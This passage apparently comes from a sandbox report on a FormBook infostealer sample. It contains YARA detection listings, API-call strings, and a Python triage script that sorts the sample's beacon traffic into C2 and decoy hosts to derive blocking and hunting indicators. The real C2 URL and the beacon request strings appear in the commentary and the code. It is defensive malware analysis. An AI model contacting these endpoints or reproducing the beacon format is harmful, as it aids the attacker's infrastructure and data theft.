Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe | Code function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
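The networking findings above belong together: the extracted configuration names a single C2 URL (www.tgalegail.quest/n6fr/) plus a long decoy list, and every host that explorer.exe actually resolved or fetched during the run (www.yr-golf.com, www.assisttm.com, www.fastbest.host, www.tyjgfuke.com, www.gsjbd1.club) is on that decoy list. Blocking the domains seen in the pcap would therefore block nothing that matters. The Python below is an added example, not part of the report: it loads a configuration in the shape the report's extractor emits (decoy list shortened to the entries used here), classifies each observed request as C2, decoy or unrelated, and derives the indicators worth acting on: the C2 host taken from the configuration rather than from the traffic, and the shared URI path /n6fr/ with its fixed query parameter names, which appear in decoy and C2 requests alike. The www.example.com request is a constructed negative case.

```python
import json
from urllib.parse import urlsplit

# Configuration in the shape the report's extractor emits; the decoy list is
# shortened to the entries needed for this example.
CONFIG_JSON = """{"C2 list": ["www.tgalegail.quest/n6fr/"],
 "decoy": ["yr-golf.com", "assisttm.com", "fastbest.host", "tyjgfuke.com",
           "gsjbd1.club", "magnetic-island-qld.com"]}"""

# (Host header, request target) pairs from the report's HTTP traffic, plus one
# constructed unrelated request as a negative case.
OBSERVED = [
    ("www.yr-golf.com",
     "/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=BQDMjsZC/MHMhOokLNCZ8NvLdfoNcIlcbjuvjCJyzVYcZRVM3RE3M6YlVSnQ+pY87GBB"),
    ("www.assisttm.com",
     "/n6fr/?r8Yhe8X=GhRWdiRsNNJH8eQL+yxTqcpdK2zUc5yAzRv8ilcs8c/60sXMgS13/r7ilAGjTWuYzon7&W0Gd5=_zrxFrQh"),
    ("www.fastbest.host",
     "/n6fr/?W0Gd5=_zrxFrQh&r8Yhe8X=RitrxMT4CF2430UT8yTHljH4YcWCFGycH+KnQUedz6G1CLl+fZ1eccWunXIbAos2Mzom"),
    ("www.example.com", "/index.html"),
]


def bare_host(host: str) -> str:
    """Lower-case and drop a leading 'www.' so hosts compare with the decoy list."""
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def load_config(raw: str) -> dict:
    cfg = json.loads(raw)
    c2 = []
    for entry in cfg["C2 list"]:
        parts = urlsplit("http://" + entry)  # entries carry no scheme
        c2.append({"host": parts.hostname, "bare": bare_host(parts.hostname),
                   "path": parts.path or "/"})
    return {"c2": c2, "decoys": {d.lower() for d in cfg["decoy"]}}


def classify(cfg: dict, host: str, target: str) -> str:
    path = urlsplit(target).path
    bare = bare_host(host)
    if any(bare == c2["bare"] for c2 in cfg["c2"]):
        return "c2"
    if bare in cfg["decoys"]:
        return "decoy"
    if any(path == c2["path"] for c2 in cfg["c2"]):
        return "c2_path_unknown_host"  # campaign path on a host the config does not list
    return "unrelated"


def beacon_params(target: str) -> dict:
    """Raw query parameters (no percent/plus decoding, the values look base64-like)."""
    query = urlsplit(target).query
    return dict((p.split("=", 1) if "=" in p else (p, "")) for p in query.split("&") if p)


def triage(cfg: dict, observed) -> dict:
    classes = [(host, classify(cfg, host, target)) for host, target in observed]
    beacons = [beacon_params(t) for (h, t), (_, cls) in zip(observed, classes) if cls != "unrelated"]
    names = set.intersection(*(set(b) for b in beacons)) if beacons else set()
    constant = {k for k in names if len({b[k] for b in beacons}) == 1}
    return {
        "block_hosts": {c2["host"] for c2 in cfg["c2"]},  # from the config, not the pcap
        "decoy_hosts": {h for h, cls in classes if cls == "decoy"},
        "hunt_paths": {c2["path"] for c2 in cfg["c2"]},
        "beacon_param_names": sorted(names),
        "constant_params": {k: beacons[0][k] for k in constant},
        "classes": classes,
    }


if __name__ == "__main__":
    for key, value in triage(load_config(CONFIG_JSON), OBSERVED).items():
        print(f"{key}: {value}")
```

The decoy hosts are still useful as a hunting pivot (a host that requests /n6fr/ with the W0Gd5 parameter is infected whichever domain it picked), but only the configuration's C2 entry belongs on a block list.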

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File sources: the same 11 unpacked PEs and 11 memory dumps listed under "Yara detected FormBook" in the AV Detection section above.

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: Y1p8VPvyU2.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Y1p8VPvyU2.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Y1p8VPvyU2.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Y1p8VPvyU2.exe.2420000.1.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Y1p8VPvyU2.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Y1p8VPvyU2.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.Y1p8VPvyU2.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Y1p8VPvyU2.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.0.Y1p8VPvyU2.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.304934739.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.304424908.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000000.303509344.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.565875481.0000000001220000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.567386686.00000000038B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.361567881.0000000000670000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.361497642.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.361714769.00000000009E0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.566653867.0000000003440000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000000.336290310.0000000010086000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1; date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.305776988.0000000002420000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook; author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_00406043
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_00404618
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_0040681A
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_1000E44F
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_1000E867
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_1000EC9C
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_1000F0D1
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_100170E6
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_100191A3
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_10021DE2
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_10021DF1
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_10017E00
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_1001424E
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_10017658
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_1000DF5B
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 0_2_10016B74
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00401030
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_00401175
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_0041C997
Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe; Code function: 1_2_0041BB46
